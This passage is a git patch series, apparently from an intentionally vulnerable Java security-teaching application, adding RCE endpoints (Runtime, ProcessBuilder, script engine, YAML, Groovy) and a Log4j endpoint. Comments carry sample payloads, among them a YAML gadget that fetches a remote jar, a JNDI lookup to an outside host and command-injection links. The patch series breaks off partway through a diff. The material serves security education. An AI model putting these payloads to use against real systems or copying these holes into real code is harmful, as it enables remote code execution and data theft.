diff --git a/java-sec-code.iml b/java-sec-code.iml
index 720895cc..59b2063d 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -215,5 +215,6 @@
     <orderEntry type="library" name="Maven: org.springframework.plugin:spring-plugin-metadata:1.2.0.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
     <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
+    <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.16" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/src/main/java/org/joychou/controller/FileUpload.java b/src/main/java/org/joychou/controller/FileUpload.java
index 8b7c7373..00ab7008 100644
--- a/src/main/java/org/joychou/controller/FileUpload.java
+++ b/src/main/java/org/joychou/controller/FileUpload.java
@@ -31,14 +31,17 @@
 public class FileUpload {
 
     // Save the uploaded file to this folder
-    private static String UPLOADED_FOLDER = "/tmp/";
+    private static final String UPLOADED_FOLDER = "/tmp/";
     private final Logger logger = LoggerFactory.getLogger(this.getClass());
+    private static String randomFilePath = "";
 
-    @GetMapping("/")
+    // uplaod any file
+    @GetMapping("/any")
     public String index() {
         return "upload"; // return upload.html page
     }
 
+    // only allow to upload pictures
     @GetMapping("/pic")
     public String uploadPic() {
         return "uploadPic"; // return uploadPic.html page
@@ -64,13 +67,16 @@ public String singleFileUpload(@RequestParam("file") MultipartFile file,
 
         } catch (IOException e) {
             redirectAttributes.addFlashAttribute("message", "upload failed");
-            e.printStackTrace();
-            return "redirect:/file/status";
+            logger.error(e.toString());
         }
 
         return "redirect:/file/status";
     }
 
+    @GetMapping("/status")
+    public String uploadStatus() {
+        return "uploadStatus";
+    }
 
     // only upload picture
     @PostMapping("/upload/picture")
@@ -83,11 +89,12 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
         String fileName = multifile.getOriginalFilename();
         String Suffix = fileName.substring(fileName.lastIndexOf(".")); // 获取文件后缀名
         String mimeType = multifile.getContentType(); // 获取MIME类型
+        String filePath = UPLOADED_FOLDER + fileName;
         File excelFile = convert(multifile);
 
 
         // 判断文件后缀名是否在白名单内  校验1
-        String picSuffixList[] = {".jpg", ".png", ".jpeg", ".gif", ".bmp", ".ico"};
+        String[] picSuffixList = {".jpg", ".png", ".jpeg", ".gif", ".bmp", ".ico"};
         boolean suffixFlag = false;
         for (String white_suffix : picSuffixList) {
             if (Suffix.toLowerCase().equals(white_suffix)) {
@@ -97,13 +104,13 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
         }
         if (!suffixFlag) {
             logger.error("[-] Suffix error: " + Suffix);
-            deleteFile(excelFile);
+            deleteFile(filePath);
             return "Upload failed. Illeagl picture.";
         }
 
 
         // 判断MIME类型是否在黑名单内 校验2
-        String mimeTypeBlackList[] = {
+        String[] mimeTypeBlackList = {
                 "text/html",
                 "text/javascript",
                 "application/javascript",
@@ -115,17 +122,18 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
             // 用contains是为了防止text/html;charset=UTF-8绕过
             if (SecurityUtil.replaceSpecialStr(mimeType).toLowerCase().contains(blackMimeType)) {
                 logger.error("[-] Mime type error: " + mimeType);
-                deleteFile(excelFile);
+                deleteFile(filePath);
                 return "Upload failed. Illeagl picture.";
             }
         }
 
         // 判断文件内容是否是图片 校验3
         boolean isImageFlag = isImage(excelFile);
+        deleteFile(randomFilePath);
 
         if (!isImageFlag) {
             logger.error("[-] File is not Image");
-            deleteFile(excelFile);
+            deleteFile(filePath);
             return "Upload failed. Illeagl picture.";
         }
 
@@ -137,28 +145,29 @@ public String uploadPicture(@RequestParam("file") MultipartFile multifile) throw
             Files.write(path, bytes);
         } catch (IOException e) {
             logger.error(e.toString());
-            deleteFile(excelFile);
+            deleteFile(filePath);
             return "Upload failed";
         }
 
-        deleteFile(excelFile);
         logger.info("[+] Safe file. Suffix: {}, MIME: {}", Suffix, mimeType);
-        logger.info("[+] Successfully uploaded {}{}", UPLOADED_FOLDER, multifile.getOriginalFilename());
-        return "Upload success";
+        logger.info("[+] Successfully uploaded {}", filePath);
+        return String.format("You successfully uploaded '%s'", filePath);
     }
 
-    private void deleteFile(File... files) {
-        for (File file : files) {
-            if (file.exists()) {
-                boolean ret = file.delete();
-                if (ret) {
-                    logger.debug("File delete successfully!");
-                }
+    private void deleteFile(String filePath) {
+        File delFile = new File(filePath);
+        if(delFile.isFile() && delFile.exists()) {
+            if (delFile.delete()) {
+                logger.info("[+] " + filePath + " delete successfully!");
+                return;
             }
         }
+        logger.info(filePath + " delete failed!");
     }
 
     /**
+     * 为了使用ImageIO.read()
+     *
      * 不建议使用transferTo，因为原始的MultipartFile会被覆盖
      * https://stackoverflow.com/questions/24339990/how-to-convert-a-multipart-file-to-file
      */
@@ -166,8 +175,9 @@ private File convert(MultipartFile multiFile) throws Exception {
         String fileName = multiFile.getOriginalFilename();
         String suffix = fileName.substring(fileName.lastIndexOf("."));
         UUID uuid = Generators.timeBasedGenerator().generate();
-
-        File convFile = new File(UPLOADED_FOLDER + uuid + suffix);
+        randomFilePath = UPLOADED_FOLDER + uuid + suffix;
+        // 随机生成一个同后缀名的文件
+        File convFile = new File(randomFilePath);
         boolean ret = convFile.createNewFile();
         if (!ret) {
             return null;
@@ -183,6 +193,6 @@ private File convert(MultipartFile multiFile) throws Exception {
      */
     private static boolean isImage(File file) throws IOException {
         BufferedImage bi = ImageIO.read(file);
-        return bi == null;
+        return bi != null;
     }
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index c9934946..6f920495 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -7,13 +7,17 @@ mybatis.mapper-locations=classpath:mapper/*.xml
 # mybatis SQL log
 logging.level.org.joychou.mapper=debug
 
-# Spring Boot Actuator Vulnerable Config
+# Spring Boot Actuator Config
 management.security.enabled=false
+endpoints.enabled=false
+
+
 # logging.config=classpath:logback-online.xml
 
 # 业务的callback参数，不支持多个
 joychou.business.callback = callback_
 
+
 ### check referer configuration begins ###
 joychou.security.referer.enabled = false
 joychou.security.referer.host = joychou.org, joychou.com
@@ -38,5 +42,5 @@ joychou.security.jsonp.referer.check.enabled = true
 joychou.security.jsonp.callback = callback, _callback
 ### jsonp configuration ends ###
 
-
+# swagger
 swagger.enable = true
\ No newline at end of file
diff --git a/src/main/resources/templates/index.html b/src/main/resources/templates/index.html
index 72779b8e..9d27f958 100644
--- a/src/main/resources/templates/index.html
+++ b/src/main/resources/templates/index.html
@@ -11,7 +11,8 @@
         <a th:href="@{/swagger-ui.html}">Swagger</a>&nbsp;&nbsp;
         <a th:href="@{/codeinject?filepath=/tmp;cat /etc/passwd}">CmdInject</a>&nbsp;&nbsp;
         <a th:href="@{/jsonp/getToken?_callback=test}">JSONP</a>&nbsp;&nbsp;
-        <a th:href="@{/file/pic}">FileUpload</a>&nbsp;&nbsp;
+        <a th:href="@{/file/pic}">Picture Upload</a>&nbsp;&nbsp;
+        <a th:href="@{/file/any}">File Upload</a>&nbsp;&nbsp;
         <a th:href="@{cors/sec/originFilter}">Cors</a>&nbsp;&nbsp;
         <a th:href="@{/path_traversal/vul?filepath=../../../../../etc/passwd}">PathTraversal</a>&nbsp;&nbsp;
         <a th:href="@{sqli/mybatis/vuln01?username=joychou' or '1'='1}">SqlInject</a>&nbsp;&nbsp;
diff --git a/src/main/resources/templates/uploadStatus.html b/src/main/resources/templates/uploadStatus.html
new file mode 100644
index 00000000..f39fa45c
--- /dev/null
+++ b/src/main/resources/templates/uploadStatus.html
@@ -0,0 +1,10 @@
+<!DOCTYPE html>
+<html lang="en" xmlns:th="http://www.thymeleaf.org">
+<body>
+
+<div th:if="${message}">
+    <h4 th:text="${message}"/>
+</div>
+
+</body>
+</html>
\ No newline at end of file

From 1f9da367f90eba38049fbc3bc510b847fb9f173a Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Fri, 26 Mar 2021 17:30:42 +0800
Subject: [PATCH 085/108] add rce

---
 README.md                                     |  7 +-
 README_zh.md                                  |  7 +-
 java-sec-code.iml                             |  5 +-
 pom.xml                                       | 15 ++++
 src/main/java/org/joychou/controller/Rce.java | 88 ++++++++++++++++++-
 5 files changed, 117 insertions(+), 5 deletions(-)

diff --git a/README.md b/README.md
index 56d10960..c52fd3d9 100644
--- a/README.md
+++ b/README.md
@@ -11,7 +11,7 @@ This project can also be called Java vulnerability code.
 
 Each vulnerability type code has a security vulnerability by default unless there is no vulnerability. The relevant fix code is in the comments or code. Specifically, you can view each vulnerability code and comments.
 
-[Online demo](http://118.25.15.216:8080)
+Due to the server expiration, the online demo site had to go offline.
 
 Login username & password:
 
@@ -40,6 +40,11 @@ Sort by letter.
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
+  - Runtime
+  - ProcessBuilder
+  - ScriptEngine
+  - Yaml Deserialize  
+  - Groovy
 - [Swagger](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/config/SwaggerConfig.java)
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
diff --git a/README_zh.md b/README_zh.md
index 72477885..97693583 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -10,7 +10,7 @@
 
 每个漏洞类型代码默认存在安全漏洞（除非本身不存在漏洞），相关修复代码在注释里。具体可查看每个漏洞代码和注释。
 
-[在线Demo](http://118.25.15.216:8080)
+由于服务器到期，在线的Demo网站已不能使用。
 
 登录用户名密码：
 
@@ -35,6 +35,11 @@ joychou/joychou123
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
+    - Runtime
+    - ProcessBuilder  
+    - ScriptEngine
+    - Yaml Deserialize
+    - Groovy
 - [SpEL](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SpEL.java)
 - [SQL Injection](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SQLI.java)
 - [SSRF](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/SSRF.java)
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 59b2063d..e8317c18 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -41,7 +41,6 @@
     <orderEntry type="library" name="Maven: org.slf4j:jcl-over-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:jul-to-slf4j:1.7.22" level="project" />
     <orderEntry type="library" name="Maven: org.slf4j:log4j-over-slf4j:1.7.22" level="project" />
-    <orderEntry type="library" scope="RUNTIME" name="Maven: org.yaml:snakeyaml:1.17" level="project" />
     <orderEntry type="library" name="Maven: org.springframework.boot:spring-boot-starter-tomcat:1.5.1.RELEASE" level="project" />
     <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-core:8.5.11" level="project" />
     <orderEntry type="library" name="Maven: org.apache.tomcat.embed:tomcat-embed-el:8.5.11" level="project" />
@@ -216,5 +215,9 @@
     <orderEntry type="library" name="Maven: org.mapstruct:mapstruct:1.2.0.Final" level="project" />
     <orderEntry type="library" name="Maven: io.springfox:springfox-swagger-ui:2.9.2" level="project" />
     <orderEntry type="library" scope="PROVIDED" name="Maven: org.projectlombok:lombok:1.18.16" level="project" />
+    <orderEntry type="library" name="Maven: org.yaml:snakeyaml:1.21" level="project" />
+    <orderEntry type="library" name="Maven: org.springframework:spring-test:4.3.6.RELEASE" level="project" />
+    <orderEntry type="library" name="Maven: junit:junit:4.12" level="project" />
+    <orderEntry type="library" name="Maven: org.hamcrest:hamcrest-core:1.3" level="project" />
   </component>
 </module>
\ No newline at end of file
diff --git a/pom.xml b/pom.xml
index 6f8f3990..bcb6fc14 100644
--- a/pom.xml
+++ b/pom.xml
@@ -256,6 +256,21 @@
             <scope>provided</scope>
         </dependency>
 
+        <dependency>
+            <groupId>org.yaml</groupId>
+            <artifactId>snakeyaml</artifactId>
+            <version>1.21</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.springframework</groupId>
+            <artifactId>spring-test</artifactId>
+        </dependency>
+
+        <dependency>
+            <groupId>junit</groupId>
+            <artifactId>junit</artifactId>
+        </dependency>
 
     </dependencies>
 
diff --git a/src/main/java/org/joychou/controller/Rce.java b/src/main/java/org/joychou/controller/Rce.java
index d87b2a7b..6d6a3417 100644
--- a/src/main/java/org/joychou/controller/Rce.java
+++ b/src/main/java/org/joychou/controller/Rce.java
@@ -1,13 +1,21 @@
 package org.joychou.controller;
 
+import groovy.lang.GroovyShell;
 import org.springframework.web.bind.annotation.GetMapping;
 import org.springframework.web.bind.annotation.RequestMapping;
 import org.springframework.web.bind.annotation.RestController;
+import org.yaml.snakeyaml.Yaml;
+import org.yaml.snakeyaml.constructor.SafeConstructor;
 
+import javax.script.Bindings;
+import javax.script.ScriptContext;
+import javax.script.ScriptEngine;
+import javax.script.ScriptEngineManager;
 import java.io.BufferedInputStream;
 import java.io.BufferedReader;
 import java.io.InputStreamReader;
 
+
 /**
  * Java code execute
  *
@@ -17,7 +25,7 @@
 @RequestMapping("/rce")
 public class Rce {
 
-    @GetMapping("/exec")
+    @GetMapping("/runtime/exec")
     public String CommandExec(String cmd) {
         Runtime run = Runtime.getRuntime();
         StringBuilder sb = new StringBuilder();
@@ -40,9 +48,85 @@ public String CommandExec(String cmd) {
             inBr.close();
             in.close();
         } catch (Exception e) {
-            return "Except";
+            return e.toString();
+        }
+        return sb.toString();
+    }
+
+
+    /**
+     * http://localhost:8080/rce/ProcessBuilder?cmd=whoami
+     * @param cmd cmd
+     */
+    @GetMapping("/ProcessBuilder")
+    public String processBuilder(String cmd) {
+
+        StringBuilder sb = new StringBuilder();
+
+        try {
+            String[] arrCmd = {"/bin/sh", "-c", cmd};
+            ProcessBuilder processBuilder = new ProcessBuilder(arrCmd);
+            Process p = processBuilder.start();
+            BufferedInputStream in = new BufferedInputStream(p.getInputStream());
+            BufferedReader inBr = new BufferedReader(new InputStreamReader(in));
+            String tmpStr;
+
+            while ((tmpStr = inBr.readLine()) != null) {
+                sb.append(tmpStr);
+            }
+        } catch (Exception e) {
+            return e.toString();
         }
+
         return sb.toString();
     }
+
+
+    /**
+     * http://localhost:8080/rce/jscmd?jsurl=http://xx.yy/zz.js
+     *
+     * curl http://xx.yy/zz.js
+     * var a = mainOutput(); function mainOutput() { var x=java.lang.Runtime.getRuntime().exec("open -a Calculator");}
+     *
+     * @param jsurl js url
+     */
+    @GetMapping("/jscmd")
+    public void jsEngine(String jsurl) throws Exception{
+        // js nashorn javascript ecmascript
+        ScriptEngine engine = new ScriptEngineManager().getEngineByName("js");
+        Bindings bindings = engine.getBindings(ScriptContext.ENGINE_SCOPE);
+        String cmd = String.format("load(\"%s\")", jsurl);
+        engine.eval(cmd, bindings);
+    }
+
+
+    /**
+     * http://localhost:8080/rce/vuln/yarm?content=!!javax.script.ScriptEngineManager%20[!!java.net.URLClassLoader%20[[!!java.net.URL%20[%22http://test.joychou.org:8086/yaml-payload.jar%22]]]]
+     * yaml-payload.jar: https://github.com/artsploit/yaml-payload
+     *
+     * @param content payloads
+     */
+    @GetMapping("/vuln/yarm")
+    public void yarm(String content) {
+        Yaml y = new Yaml();
+        y.load(content);
+    }
+
+    @GetMapping("/sec/yarm")
+    public void secYarm(String content) {
+        Yaml y = new Yaml(new SafeConstructor());
+        y.load(content);
+    }
+
+    /**
+     * http://localhost:8080/rce/groovy?content="open -a Calculator".execute()
+     * @param content groovy shell
+     */
+    @GetMapping("groovy")
+    public void groovyshell(String content) {
+        GroovyShell groovyShell = new GroovyShell();
+        groovyShell.evaluate(content);
+    }
+
 }
 

From ed281042e28ba3292c126844ca9df90df39a68b7 Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Thu, 31 Mar 2022 15:43:26 +0800
Subject: [PATCH 086/108] add log4j

---
 README.md                                     |  1 +
 README_zh.md                                  |  1 +
 java-sec-code.iml                             |  4 +--
 pom.xml                                       |  9 +++++-
 .../java/org/joychou/controller/Log4j.java    | 29 +++++++++++++++++++
 .../java/org/joychou/controller/SQLI.java     |  2 +-
 .../java/org/joychou/controller/SSRF.java     |  2 +-
 .../java/org/joychou/filter/OriginFilter.java |  1 +
 .../joychou/security/ssrf/SSRFChecker.java    |  4 +--
 src/main/java/org/joychou/util/HttpUtils.java | 13 +++++----
 src/main/resources/application.properties     |  2 +-
 11 files changed, 54 insertions(+), 14 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Log4j.java

diff --git a/README.md b/README.md
index c52fd3d9..d4d62134 100644
--- a/README.md
+++ b/README.md
@@ -37,6 +37,7 @@ Sort by letter.
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jsonp.java)
+- [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
diff --git a/README_zh.md b/README_zh.md
index 97693583..8beb7805 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -32,6 +32,7 @@ joychou/joychou123
 - [IP Forge](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/IPForge.java)
 - [Java RMI](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/RMI/Server.java)
 - [JSONP](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/jsonp/JSONP.java)
+- [Log4j](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Log4j.java)
 - [ooxmlXXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/othervulns/ooxmlXXE.java)
 - [PathTraversal](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/PathTraversal.java)
 - [RCE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Rce.java)
diff --git a/java-sec-code.iml b/java-sec-code.iml
index e8317c18..9f5f1029 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -79,8 +79,8 @@
     <orderEntry type="library" name="Maven: commons-codec:commons-codec:1.10" level="project" />
     <orderEntry type="library" name="Maven: org.apache.httpcomponents:fluent-hc:4.3.6" level="project" />
     <orderEntry type="library" name="Maven: commons-logging:commons-logging:1.1.3" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.8.2" level="project" />
-    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.7" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-core:2.9.1" level="project" />
+    <orderEntry type="library" name="Maven: org.apache.logging.log4j:log4j-api:2.9.1" level="project" />
     <orderEntry type="library" name="Maven: com.squareup.okhttp:okhttp:2.5.0" level="project" />
     <orderEntry type="library" name="Maven: com.squareup.okio:okio:1.6.0" level="project" />
     <orderEntry type="library" name="Maven: org.apache.commons:commons-digester3:3.2" level="project" />
diff --git a/pom.xml b/pom.xml
index bcb6fc14..e22713da 100644
--- a/pom.xml
+++ b/pom.xml
@@ -100,7 +100,13 @@
         <dependency>
             <groupId>org.apache.logging.log4j</groupId>
             <artifactId>log4j-core</artifactId>
-            <version>2.8.2</version>
+            <version>2.9.1</version>
+        </dependency>
+
+        <dependency>
+            <groupId>org.apache.logging.log4j</groupId>
+            <artifactId>log4j-api</artifactId>
+            <version>2.9.1</version>
         </dependency>
 
         <dependency>
@@ -129,6 +135,7 @@
             <artifactId>spring-boot-starter-actuator</artifactId>
         </dependency>
 
+        <!-- eureka -->
         <dependency>
             <groupId>org.springframework.cloud</groupId>
             <artifactId>spring-cloud-starter-netflix-eureka-client</artifactId>
diff --git a/src/main/java/org/joychou/controller/Log4j.java b/src/main/java/org/joychou/controller/Log4j.java
new file mode 100644
index 00000000..ada8a394
--- /dev/null
+++ b/src/main/java/org/joychou/controller/Log4j.java
@@ -0,0 +1,29 @@
+package org.joychou.controller;
+
+import org.apache.logging.log4j.LogManager;
+import org.apache.logging.log4j.Logger;
+import org.springframework.web.bind.annotation.GetMapping;
+import org.springframework.web.bind.annotation.RestController;
+
+@RestController
+public class Log4j {
+
+    private static final Logger logger = LogManager.getLogger("Log4j");
+
+    /**
+     * http://localhost:8080/log4j?token=${jndi:ldap://wffsr5.dnslog.cn:9999}
+     * Default: error/fatal/off
+     * Fix: Update log4j to lastet version.
+     * @param token token
+     */
+    @GetMapping("/log4j")
+    public String log4j(String token) {
+        if(token.equals("java-sec-code")) {
+            return "java sec code";
+        } else {
+            logger.error(token);
+            return "error";
+        }
+    }
+
+}
diff --git a/src/main/java/org/joychou/controller/SQLI.java b/src/main/java/org/joychou/controller/SQLI.java
index 7ea518a5..afabfe15 100644
--- a/src/main/java/org/joychou/controller/SQLI.java
+++ b/src/main/java/org/joychou/controller/SQLI.java
@@ -43,7 +43,7 @@ public class SQLI {
 
     /**
      * Vuln Code.
-     * http://localhost:8080/sqli/jdbc/vul?username=joychou
+     * http://localhost:8080/sqli/jdbc/vuln?username=joychou
      *
      * @param username username
      */
diff --git a/src/main/java/org/joychou/controller/SSRF.java b/src/main/java/org/joychou/controller/SSRF.java
index 8645fd13..aa76f9fe 100644
--- a/src/main/java/org/joychou/controller/SSRF.java
+++ b/src/main/java/org/joychou/controller/SSRF.java
@@ -67,7 +67,7 @@ public String URLConnectionSec(String url) {
     public String httpURLConnection(@RequestParam String url) {
         try {
             SecurityUtil.startSSRFHook();
-            return HttpUtils.HTTPURLConnection(url);
+            return HttpUtils.HttpURLConnection(url);
         } catch (SSRFException | IOException e) {
             return e.getMessage();
         } finally {
diff --git a/src/main/java/org/joychou/filter/OriginFilter.java b/src/main/java/org/joychou/filter/OriginFilter.java
index 32195a27..d57f667a 100644
--- a/src/main/java/org/joychou/filter/OriginFilter.java
+++ b/src/main/java/org/joychou/filter/OriginFilter.java
@@ -7,6 +7,7 @@
 import javax.servlet.http.HttpServletResponse;
 import java.io.IOException;
 
+import org.apache.catalina.servlet4preview.http.HttpFilter;
 import org.joychou.security.SecurityUtil;
 import org.slf4j.Logger;
 import org.slf4j.LoggerFactory;
diff --git a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
index 01b1b350..0930e2b5 100644
--- a/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
+++ b/src/main/java/org/joychou/security/ssrf/SSRFChecker.java
@@ -147,8 +147,8 @@ static boolean isInternalIp(String strIP) {
     /**
      * host转换为IP
      * 会将各种进制的ip转为正常ip
-     * 167772161转换为10.0.0.1
-     * 127.0.0.1.xip.io转换为127.0.0.1
+     * 167772161 转换为  10.0.0.1
+     * 127.0.0.1.xip.io 转换为 127.0.0.1
      *
      * @param host 域名host
      */
diff --git a/src/main/java/org/joychou/util/HttpUtils.java b/src/main/java/org/joychou/util/HttpUtils.java
index 4d2be1a4..4f608301 100644
--- a/src/main/java/org/joychou/util/HttpUtils.java
+++ b/src/main/java/org/joychou/util/HttpUtils.java
@@ -5,7 +5,6 @@
 import org.apache.commons.httpclient.methods.GetMethod;
 import org.apache.commons.io.IOUtils;
 import org.apache.http.HttpResponse;
-import org.apache.http.client.config.RequestConfig;
 import org.apache.http.client.fluent.Request;
 import org.apache.http.client.methods.HttpGet;
 import org.apache.http.impl.client.CloseableHttpClient;
@@ -21,6 +20,7 @@
 import javax.imageio.ImageIO;
 import java.io.BufferedReader;
 import java.io.IOException;
+import java.io.InputStream;
 import java.io.InputStreamReader;
 import java.net.HttpURLConnection;
 import java.net.URI;
@@ -33,7 +33,7 @@
  */
 public class HttpUtils {
 
-    private static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
+    private final static Logger logger = LoggerFactory.getLogger(HttpUtils.class);
 
     public static String commonHttpClient(String url) {
 
@@ -110,12 +110,14 @@ public static String URLConnection(String url) {
     }
 
 
-    public static String HTTPURLConnection(String url) {
+    public static String HttpURLConnection(String url) {
         try {
             URL u = new URL(url);
             URLConnection urlConnection = u.openConnection();
-            HttpURLConnection httpUrl = (HttpURLConnection) urlConnection;
-            BufferedReader in = new BufferedReader(new InputStreamReader(httpUrl.getInputStream())); //send request
+            HttpURLConnection conn = (HttpURLConnection) urlConnection;
+            // Many HttpURLConnection methods can send http request, such as getResponseCode, getHeaderField
+            InputStream is = conn.getInputStream();  // send request
+            BufferedReader in = new BufferedReader(new InputStreamReader(is));
             String inputLine;
             StringBuilder html = new StringBuilder();
 
@@ -206,7 +208,6 @@ public static String HttpAsyncClients(String url) {
                 logger.error(e.getMessage());
             }
         }
-
     }
 
 }
diff --git a/src/main/resources/application.properties b/src/main/resources/application.properties
index 6f920495..96ca82c3 100644
--- a/src/main/resources/application.properties
+++ b/src/main/resources/application.properties
@@ -9,7 +9,7 @@ logging.level.org.joychou.mapper=debug
 
 # Spring Boot Actuator Config
 management.security.enabled=false
-endpoints.enabled=false
+endpoints.enabled=true
 
 
 # logging.config=classpath:logback-online.xml

From 707d395a77a6e42f7483fa1257fb6a74f301e7ae Mon Sep 17 00:00:00 2001
From: JoyChou <viarus@qq.com>
Date: Wed, 21 Sep 2022 12:19:48 +0800
Subject: [PATCH 087/108] add jwt

---
 README.md                                     |   3 +-
 README_zh.md                                  |   3 +-
 java-sec-code.iml                             |   4 +-
 pom.xml                                       |  21 ++++
 src/main/java/org/joychou/Application.java    |   1 -
 .../org/joychou/controller/Deserialize.java   |   3 +
 src/main/java/org/joychou/controller/Jwt.java |  62 +++++++++++
 .../java/org/joychou/controller/SQLI.java     |  44 ++++++++
 .../java/org/joychou/controller/SSRF.java     |   5 +
 .../java/org/joychou/util/CookieUtils.java    |  24 ++++
 src/main/java/org/joychou/util/HttpUtils.java |  14 ++-
 src/main/java/org/joychou/util/JwtUtils.java  | 103 ++++++++++++++++++
 src/main/resources/templates/index.html       |   5 +
 13 files changed, 287 insertions(+), 5 deletions(-)
 create mode 100644 src/main/java/org/joychou/controller/Jwt.java
 create mode 100644 src/main/java/org/joychou/util/CookieUtils.java
 create mode 100644 src/main/java/org/joychou/util/JwtUtils.java

diff --git a/README.md b/README.md
index d4d62134..edfda09c 100644
--- a/README.md
+++ b/README.md
@@ -57,7 +57,7 @@ Sort by letter.
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
 - [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-
+- [JWT](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jwt.java)
 
 
 ## Vulnerability Description
@@ -75,6 +75,7 @@ Sort by letter.
 - [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
 - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
+- [JWT](https://github.com/JoyChou93/java-sec-code/wiki/JWT)
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 ## How to run
diff --git a/README_zh.md b/README_zh.md
index 8beb7805..111c8be3 100644
--- a/README_zh.md
+++ b/README_zh.md
@@ -51,7 +51,7 @@ joychou/joychou123
 - [XSS](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XSS.java)
 - [XStream](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XStreamRce.java)
 - [XXE](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/XXE.java)
-
+- [JWT](https://github.com/JoyChou93/java-sec-code/blob/master/src/main/java/org/joychou/controller/Jwt.java)
 
 ## 漏洞说明
 
@@ -68,6 +68,7 @@ joychou/joychou123
 - [SSTI](https://github.com/JoyChou93/java-sec-code/wiki/SSTI)
 - [URL whitelist Bypass](https://github.com/JoyChou93/java-sec-code/wiki/URL-whtielist-Bypass)
 - [XXE](https://github.com/JoyChou93/java-sec-code/wiki/XXE)
+- [JWT](https://github.com/JoyChou93/java-sec-code/wiki/JWT)  
 - [Others](https://github.com/JoyChou93/java-sec-code/wiki/others)
 
 
diff --git a/java-sec-code.iml b/java-sec-code.iml
index 9f5f1029..445cfa46 100644
--- a/java-sec-code.iml
+++ b/java-sec-code.iml
@@ -86,7 +86,6 @@
